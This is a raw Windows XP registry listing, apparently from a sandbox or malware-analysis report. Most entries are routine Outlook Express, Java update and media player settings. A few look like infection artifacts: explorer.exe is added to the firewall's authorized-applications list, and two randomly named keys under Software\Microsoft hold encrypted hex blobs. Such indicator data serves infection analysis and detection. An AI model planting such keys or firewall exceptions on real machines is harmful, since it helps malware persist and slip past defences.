HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TAPISRV\0000\Control ActiveService "TapiSrv"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch Epoch dword:00000009 dword:0000000c
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List C:\WINDOWS\explorer.exe "C:\WINDOWS\explorer.exe:*:Enabled:Windows Explorer"
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\ShellNoRoam\MUICache C:\WINDOWS\explorer.exe "Windows Explorer"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities Identity Ordinal dword:00000001 dword:00000002
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857} Identity Ordinal dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 VerStamp dword:00000000 dword:00000003
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 SpellDontIgnoreDBCS dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 MSIMN dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 StoreMigratedV5 dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 ConvertedToDBX dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 Settings Upgraded dword:00000007
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 Running dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 Store Root hex(2):25,55,73,65,72,50,72,6f,66,69,6c,65,25,5c,4c,6f,63,61,6c,20,53,65,74,74,69,6e,67,73,5c,41,70,70,6c,69,63,61,74,69,6f,6e,20,44,61,74,61,5c,49,64,65,6e,74,69,74,69,65,73,5c,7b,46,30,37,46,43,37,31,39,2d,31,38,45,42,2d,34,42,37,31,2d,38,31,30,43,2d,43,41,44,36,46,43,39,32,30,38,35,37,7d,5c,4d,69,63,72,6f,73,6f,66,74,5c,4f,75,74,6c,6f,6f,6b,20,45,78,70,72,65,73,73,5c,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 SpoolerDlgPos hex:2c,00,00,00,00,00,00,00,01,00,00,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,b6,01,00,00,a9,00,00,00,9e,03,00,00,43,01,00,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 SpoolerTack dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0 Compact Check Count dword:00000002
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail Welcome Message dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail Accounts Checked hex:00,00,00,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail Safe Attachments dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail Secure Safe Attachments dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail Default_CodePage dword:00006faf
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\News
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\News Accounts Checked hex:00,00,00,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Rules
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Rules\Mail
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident\Main
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Trident\Settings
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Runtime Environment
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Runtime Environment\1.6.0_29
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Runtime Environment\1.6.0_29 BalloonShown dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy LastUpdateBeginTime "Sat, 22 Sep 2012 16:30:08 GMT"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy LastUpdateFinishTime "Sat, 22 Sep 2012 16:30:09 GMT"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy VersionXmlURL "http://javadl-esd.sun.com/update/1.6.0/au-descriptor-1.6.0_35-b10.xml"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX UpdateSchedule dword:00000011
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX UpdateScheduleMinutes dword:0000001a
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX Frequency dword:00000020
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\JavaSoft\Java Update\Policy\JavaFX LastUpdateInvokedTime "Sat, 22 Sep 2012 16:30:09 GMT"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Direct3D
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Direct3D\MostRecentApplication
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Direct3D\MostRecentApplication Name "java.exe"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager Server ID dword:00000004
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager Default LDAP Account "Active Directory GC"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts PreConfigVer dword:00000004
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts PreConfigVerNTDS dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts ConnectionSettingsMigrated dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts AssociatedID hex:19,c7,7f,f0,eb,18,71,4b,81,0c,ca,d6,fc,92,08,57,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Server ID dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC Account Name "Active Directory"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Server "NULL"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Search Return dword:00000064
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Timeout dword:0000003c
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Authentication dword:00000002
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Simple Search dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Bind DN dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Port dword:00000cc4
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Resolve Flag dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Secure Connection dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP User Name "NULL"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Search Base "NULL"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Server ID dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot Account Name "Bigfoot Internet Directory Service"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Server "ldap.bigfoot.com"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP URL "http://www.bigfoot.com"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Search Return dword:00000064
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Timeout dword:0000003c
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Authentication dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Simple Search dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Logo hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,62,69,67,66,6f,6f,74,2e,62,6d,70,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Server ID dword:00000002
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign Account Name "VeriSign Internet Directory Service"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Server "directory.verisign.com"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP URL "http://www.verisign.com"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Search Return dword:00000064
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Timeout dword:0000003c
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Authentication dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Search Base "NULL"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Simple Search dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Logo hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,76,65,72,69,73,69,67,6e,2e,62,6d,70,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Server ID dword:00000003
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere Account Name "WhoWhere Internet Directory Service"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Server "ldap.whowhere.com"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP URL "http://www.whowhere.com"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Search Return dword:00000064
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Timeout dword:0000003c
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Authentication dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Simple Search dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Logo hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,77,68,6f,77,68,65,72,65,2e,62,6d,70,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Rowi
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Rowi Xoywarsu hex:ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,da,81,20,17,73,ab,ee,51,52,94,51,12,67,6e,e8,7a,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,8a,c7,26,4a,74,cb,75,91,2d,a4,34,86,54,16,8b,30,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Siabvu
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Siabvu Vumyyfdol hex:8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,75,13,7f,ce,dc,8a,b9,4f,2f,3e,98,05,e5,54,e7,1e,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4 OlkContactRefresh dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4 OlkFolderRefresh dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4 FirstRun dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4\Wab File Name
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4\Wab File Name @ "C:\Documents and Settings\bomber\Application Data\Microsoft\Address Book\bomber.wab"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device FriendlyName "Default MidiOut Device"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device CLSID "{07B65360-C445-11CE-AFDE-00AA006C14F4}"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device FilterData hex:02,00,00,00,00,00,80,00,01,00,00,00,00,00,00,00,30,70,69,33,02,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,30,74,79,33,00,00,00,00,38,00,00,00,48,00,00,00,6d,69,64,73,00,00,10,00,80,00,00,aa,00,38,9b,71,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device MidiOutId dword:ffffffff
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device FriendlyName "Default DirectSound Device"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device CLSID "{79376820-07D0-11CF-A24D-0020AFD79767}"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device FilterData hex:02,00,00,00,00,00,80,00,01,00,00,00,00,00,00,00,30,70,69,33,02,00,00,00,00,00,00,00,08,00,00,00,00,00,00,00,00,00,00,00,30,74,79,33,00,00,00,00,a8,00,00,00,b8,00,00,00,31,74,79,33,00,00,00,00,a8,00,00,00,c8,00,00,00,32,74,79,33,00,00,00,00,a8,00,00,00,d8,00,00,00,33,74,79,33,00,00,00,00,a8,00,00,00,e8,00,00,00,34,74,79,33,00,00,00,00,a8,00,00,00,f8,00,00,00,35,74,79,33,00,00,00,00,a8,00,00,00,08,01,00,00,36,74,79,33,00,00,00,00,a8,00,00,00,18,01,00,00,37,74,79,33,00,00,00,00,a8,00,00,00,28,01,00,00,61,75,64,73,00,00,10,00,80,00,00,aa,00,38,9b,71,01,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,09,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,03,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,92,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,40,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,41,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,64,01,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,49,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device DSGuid "{00000000-0000-0000-0000-000000000000}"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\Privacy
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\Privacy CleanCookies dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TabbedBrowsing
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TabbedBrowsing NewTabPageShowClosedTabs dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TabbedBrowsing NewTabPageShowActivities dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\CommandBar CompatibilityViewButtonBalloonCount dword:00000001 dword:00000002
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\Recovery\Active {8CFA7582-04D2-11E2-A16C-08002765500A} dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\Recovery\Active {E4F1361D-04D0-11E2-A16B-08002765500A} dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{9695AEF9-9D03-4671-8F2F-FF49D1BB01C4} AttemptedAutoRun dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{976ABECA-93F7-4d81-9187-2A6137829675}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{99DB05E3-F81E-4C8A-A252-F396306AB6FE}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{9F9562EB-15B6-46C6-A7CB-0A66FC65130E}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{9FA014E3-076F-4865-A73C-117131B8E292}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{D5E49195-ED19-40fb-9EE0-E6625A808B77}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{E641D09E-E500-4c09-8260-F1CD7B902E9C}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{F24A1BC2-2331-4B91-8A13-5A549DA56E9D}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{FD981763-B6BB-4d51-9143-6D372A0ED56F}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\MediaLibrarySettings
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Skins
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Skins\res://wmploc/RT_TEXT/MainAppSkin.wsz
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Skins\res://wmploc/RT_TEXT/MainAppSkin.wsz Prefs "mute;False"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying InitFlags dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying ShowHorizontalSeparator dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying ShowVerticalSeparator dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying PlaylistWidth dword:000000ba
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying PlaylistHeight dword:00000064
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying SettingsWidth dword:00000064
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying SettingsHeight dword:00000087
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying MetadataWidth dword:000000ba
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying MetadataHeight dword:000000a0
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying CaptionsHeight dword:00000064
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Settings Client ID "{43209BE6-BD53-40A7-9DD3-50364635A3E4}"
